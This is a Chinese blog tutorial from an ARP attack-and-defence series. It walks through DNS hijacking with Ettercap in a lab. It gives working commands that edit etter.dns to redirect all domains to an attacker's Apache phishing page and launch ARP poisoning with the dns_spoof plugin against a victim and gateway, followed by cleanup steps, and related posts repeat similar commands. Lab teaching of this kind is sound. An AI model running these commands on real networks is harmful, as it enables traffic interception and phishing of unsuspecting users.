ARP渗透与攻防(七)之Ettercap Dns劫持

已于 2023-01-25 11:24:33 修改
阅读量2.4k 收藏 20
点赞数 1
分类专栏: ARP渗透与攻防 文章标签: 网络 安全 网络安全
于 2023-01-25 11:18:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64973687/article/details/128759607
版权

系列文章

ARP渗透与攻防(一)之ARP原理
ARP渗透与攻防(二)之断网攻击
ARP渗透与攻防(三)之流量分析
ARP渗透与攻防(四)之WireShark截获用户数据
ARP渗透与攻防(五)之Ettercap劫持用户流量
ARP渗透与攻防(六)之限制网速攻击

ARP-Ettercap Dns劫持

1.什么是DNS

1.概念

DNS是Domain Name System的缩写, 我们称之域名系统。首先它是远程调用服务,本地默认占用53端口,它本身的实质上一个域名和ip的数据库服务器,他要完成的任务是帮我们把输入的域名转换成ip地址,之后通过ip寻址连接目标服务器。

2.工作过程

当访问一个网站时系统将从DNS缓存中读取该域名所对应的IP地址,当查找不到时就会到系统中查找hosts文件,如果还没有那么才会向DNS服务器请求一个DNS查询,DNS服务器将返回该域名所对应的IP,在你的系统收到解析地址以后将使用该IP地址进行访问,同时将解析缓存到本地的DNS缓存中。

在这里插入图片描述

2.什么是DNS劫持

1.概念

DNS劫持又称域名劫持,是指在劫持的网络范围内拦截域名解析的请求,分析请求的域名,把审查范围以外的请求放行,否则返回假的IP地址或者什么都不做使请求失去响应,其效果就是对特定的网络不能访问或访问的是假网址。

2.ettercap劫持的原理

局域网劫持, 攻击者通过伪装成网关, 劫持受害者的网络请求, 将网络请求拦截到指定的服务器

3.DNS常用命令讲解

1.查看DNS缓存表

ipconfig /displaydns

在这里插入图片描述

2.获取DNS地址:

ping maishibing.com

在这里插入图片描述在这里插入图片描述

2.刷新DNS缓存

ipconfig /flushdns

在这里插入图片描述
在这里插入图片描述

3.ARP-DNS欺骗攻击步骤

环境准备

kali 作为ARP攻击机,IP地址:192.168.110.12

win10 作为被攻击方,IP地址:192.168.110.11

网关(路由器),IP地址:192.168.110.1

1.kali开启apache服务
service apache2 start

在这里插入图片描述

2.kali浏览器访问Apache的首页
http://192.168.110.12

在这里插入图片描述确认apache服务已经开启

3.编辑ettercap配置文件
1.进入配置文件位置
cd /etc/ettercap

在这里插入图片描述在这里插入图片描述

2.复制原有的配置文件(环境恢复比较方便)
cp etter.dns etter.dns2

在这里插入图片描述在这里插入图片描述

3.设置dns劫持配置文件
vi /etc/ettercap/etter.dns
添加以下内容
*   A   192.168.110.12
*   PTR 192.168.110.12
wq保存
参数
*:通配符,代表所有的网站都将被解析到192.168.110.12 
也可以换成指定的网站,比如www.jd.com,表示将www.jd.com解析到192.168.110.12
A:常被用于正向地址解析,后面跟上钓鱼的ip地址
PTR :常被用于反向地址解析,后面跟上钓鱼的ip地址

在这里插入图片描述

在这里插入图片描述

5.ettercap劫持命令讲解
 ettercap -i eth0 -Tq -M arp:remote -P dns_spoof /被攻击者ip// /被攻击者网关// 
 -i:网卡
 -T:文本模式
 -q:安静模式
 -M:执行mitm攻击
 -P:plugin 开始该插件
4.靶机访问以下网站确认环境正常
http://www.jd.com/

在这里插入图片描述

6.执行劫持命令
ettercap -i eth0 -Tq -M arp:remote -P dns_spoof /192.168.110.11// /192.168.110.1// >b.txt

在这里插入图片描述

7.分析日志
tail -f b.txt
或者
tail -f b.txt | grep "dns_spoof"

在这里插入图片描述

8.靶机重新访问以下网站查看攻击效果
http://www.jd.com/

在这里插入图片描述

可以看到虽然靶机访问的是jd.com,但打开的却是我们钓鱼的网站,DNS欺骗成功。

9.停止劫持
Ctrl+C
10.恢复dns列表,刷新dns缓存即可。
ipconfig /flushdns

刷新前:
在这里插入图片描述
刷新后:
在这里插入图片描述

11.靶机访问以下网站查看环境是否恢复正常
http://www.jd.com/

在这里插入图片描述
可以看到环境恢复正常了

12.恢复kali环境
1.进入配置文件位置
cd /etc/ettercap
2.复制dns文件到新文件
cp etter.dns etter.dns1
3.还原dns配置文件

将我们之前拷贝的etter.dns2备份文件回复正常

cp etter.dns2 etter.dns
怰月
关注
  • 1
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
kali ettercap实现dns劫持
haha1314的博客
05-14 4202
环境: 攻击方 kali虚拟机 被攻击方 win server 2003 ip:192.168.88.142 钓鱼网站 win server 2008 ip:192.168.88.136 1、先打开路由转发功能 echo 1 > /proc/sys/net/ipv4/ip_forward 2、设置配置文件 vim /etc/ettercap/etter.conf ...
ettercap实现dns欺骗过程
04-13
2. **中间人攻击(Man-in-the-Middle,MITM)**:在DNS欺骗中,ettercap扮演了MITM的角色,它在受害者与DNS服务器之间插入自己,拦截并修改DNS查询和响应。 3. **DNS工作原理**:DNS(Domain Name System)是互联网...
DNS劫持原理与操作
热门推荐
点点的博客
08-24 6万+
DNS(域名系统)的作用是把网络地址(域名,以一个字符串的形式)对应到真实的计算机能够识别的网络地址(IP地址),以便计算机能够进一步通信,传递网址和内容等。由于域名劫持往往只能在特定的被劫持网络范围内进行,所以在此范围外的域名服务器(DNS)能够返回正常的IP地址,高级用户可以在网络设置把DNS指向这些正常的域名服务器以实现对网址的正常访问。所以域名劫持通常相伴的措施——封锁正常DNS的IP。
记录kali搭建Apache+MySQL+PHP
最新发布
2301_79393404的博客
05-29 587
if ($conn->connect_error) { die("连接失败: " . $conn->connect_error);phpinfo();kali中已经预先安装好了Apache2,MySQL和PHP,所以我们在使用的时候只需要打开相应的服务即可。接着进入MySQL,创建一个名为kali的数据库,然后为该数据库创建一个用户,具体方法见。
etter cap进行DNS劫持
A_luncher的博客
11-08 1292
运用kali-Linux 中的ettercap进行dns劫持
使用ettercap进行dns劫持
f_zhangwuji的博客
09-22 1333
使用ettercap对局域网主机进行dns劫持 1.vim /etc/ettercap/etter.dns 配置劫持的域名和重定向的IP 2.开启ettercap,并点hosts->scan for hosts扫描局域网ip 3.网关加到target1,目标机加到target2 4.点击圆形图标,开启arp劫持 5.点击plugins,双击dns劫持。 5.可以看到劫持后目标机访问sina.com成功被重定向到了127.0.0.1 ...
利用ettercap进行dns挟持-钓鱼网站
qq_44232452的博客
07-20 223
这里如果报错e325 attention这是因为没有正常退出导致的。进行dns指向 A 是正向解析 PRT 是反向解析。mv abc a 把文件abc重命名为a。放弃所有修改,从上次保存文件开始编辑。双击dns选项开始dns投毒,最后显示劫持成功。:w file 将修改另存到file中不退出。开始arp投毒,可以监控到目标主机传输数据。:w 保存文件不退出。3.开启apache服务。5.打开ettercap。2.Linux常用命令。:wq 保存并退出。
ARP-Ettercap DNS劫持
m0_51957299的博客
08-23 152
Domain Name System(DNS),我们称之为域名解析系统,默认占用53端口,它的本身实质上是一个域名和IP的数据库服务器,主要是将我们输入的域名转换成IP地址,之后通过IP地址寻址连接目标服务器。当访问一个网站时主机将从DNS缓存中读取该域名所对应的IP地址,当查找不到时就会到系统中查找hosts文件,如果还没有找到那么就会向DNS服务器发送一个DNS查询请求,DNS服务器响应对应的IP地址给主机,主机收到后会使用该IP地址进行访问并将其保存到DNS缓存中。
ARP渗透与防御课程视频教程.zip
10-16
网盘文件永久链接 1-ARP原理 2-ARP断网攻击 3-ARP流量分析 4-ARP-wireshark获取用户数据 5-ARP-Ettercap-截获流量信息 6-ARP网速限制 7-ARP-DNS欺骗 8-ARP防御
ettercap实现dns欺骗报文1
04-13
DNS欺骗【上】----ettercap实现 https://blog.csdn.net/redwand/article/details/105481042
安全测试】-Linux渗透Ettercap详解.doc
11-14
Ettercap 是一款功能强大的中介攻击工具,支持主动及被动的协议解析,并包含了...Ettercap 是一款功能强大且灵活的中介攻击工具,支持多种 sniffing 工作方式和协议解析,可以满足各种网络安全测试和渗透测试的需求。
ettercap实现dns欺骗报文2
04-13
ettercap实现dns欺骗 https://blog.csdn.net/redwand/article/details/105481042
网络安全-内网DNS劫持-ettercap
weixin_48137911的博客
02-15 2579
DNS就是你访问网站,比如百度,你知道百度的域名www.baidu.com,但是你并不知道他全国各地的他那个那个IP位于哪里。最简单的操作就是你新建一个txt然后自己写内容,然后改index或者html,反正知道原理怎么搞的就行。通过查看win10的浏览器,我无论打开任何的网址,都是谈出来这个界面。那么DNS就会这个去查找对应的IP以及域名给你解析让你正常的上网。这个里面的文件夹全部拉进去kali的桌面即可,准备好的劫持的环境。这个就是提前做好的仿真的假的qq邮箱的网页。
Kali-工具-Ettercap-内网DNS劫持
weixin_44257023的博客
07-11 3213
Ettercap Ettercap是一个综合性的中间人攻击工具,它可以进行ARP欺骗DNS劫持,以欺骗方式的网络嗅探工具,主要适用于交换局域网络 准备一个网页 准备一个网页(index.html)用于当被访问的页面,将页面放到 /var/www/html/ 目录下 启动 Apache2 systemctl start apache2 启动是否成功,可以直接在kali中打开浏览器,输入 127.0.0.1 访问看看 更改Ettercap工具配置 配置文件在 /etc/ettercap/ 目录如下: 打开
Ettercap中间人攻击——DNS劫持、替换网页内容与ARP欺骗
Mr_Wanderer的博客
08-13 8036
文章目录Ettercap简介常用指令DNS劫持设置kali机攻击靶机靶机反应更换靶机访问页面的内容Ettercap替换网页内容编写过滤器发现靶机加载过滤器并开始攻击靶机反应ARP劫持监控靶机访问内容发现主机加载插件并开始攻击自动加载靶机图片靶机反应写在最后 Ettercap 简介 Ettercap是一个综合性的中间人攻击工具,使用它可以进行ARP欺骗、拦截器、DNS欺骗等常见的中间人攻击。 常用指令 1.用户界面类型 -T, –text 使用只显
内网劫持DNSEttercap
新火燎塬的博客
11-23 336
内网劫持DNSEttercap
使用kali中的ettercap进行dns劫持arp欺骗
weixin_43940853的博客
09-09 1179
准备 kali ip:192.168.230.218 win7虚拟机 ip :192.168.230.216 启动ettercap图形界面 点击第一个 扫描主机 可以看到我们的win7虚拟机就在主机列表当中 这里的192.168.230.2是我们的虚拟网卡(可以通过以上命令查询得到) 将自己的网关添加到目标一 将win7虚拟机的ip添加到目标二 开始arp欺骗,下面开始dns劫持过程 ...
Ettercap实现内网劫持目标主机DNS
weixin_45971758的博客
03-01 503
此实验只能实现劫持HTTP协议的网址,使用HTTPS无法被劫持ettercap是一个网络嗅探和拦截工具,可以用于捕获网络数据包并对其进行分析、篡改和转发。综上所述,ettercap无法劫持DNS或影响HTTPS的网站可能是由于加密的DNS和HTTPS流量无法被拦截和篡改。
dns 明文传输_简单利用EtterCap实现DNS劫持
weixin_35351343的博客
01-19 265
EtterCap是一个基于ARP地址欺骗方式的网络嗅探工具,主要适用于交换局域网络。借助于EtterCap嗅探软件,渗透测试人员可以检测网络内明文数据通讯的安全性,及时采取措施,避免敏感的用户名/密码等数据以明文的方式进行传输。ettercap几乎是每个渗透测试人员必备的工具之一。环境准备:kali:192.168.*.*win03:192.168.*.*在kali中打开EtterCap...
arpdns欺骗etc/ettercap/etter.dns怎么配置
05-23
Ettercap可以通过欺骗ARPDNS来进行中间人攻击。下面是一个简单的配置示例: 1. 欺骗ARP 首先,需要在ettercap配置文件中启用ARP欺骗。打开/etc/ettercap/etter.conf文件,找到以下行: # if you use iptables: redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" 取消注释并将其更改为: # if you use iptables: redir_command_on = "iptables -t nat -A PREROUTING -i %iface -j REDIRECT" redir_command_off = "iptables -t nat -D PREROUTING -i %iface -j REDIRECT" 这将启用IPTables规则以将所有流量重定向到ettercap。 2. 欺骗DNS 接下来,需要配置ettercap以欺骗DNS。打开/etc/ettercap/etter.dns文件,将以下内容添加到文件底部: *.example.com A 192.168.1.100 *.example.net A 192.168.1.100 这将将所有.example.com和.example.net域名解析到192.168.1.100地址。 3. 启动ettercap 现在可以启动ettercap了。打开终端并输入以下命令: sudo ettercap -Tq -M arp:remote -P dns_spoof //// 这将使用ARP欺骗和DNS欺骗启动ettercap。 请注意,中间人攻击是非法的,在未经授权的情况下进行可能会导致严重后果。在进行此操作之前,请确保您了解有关此类攻击的法律和道德问题。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

怰月

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值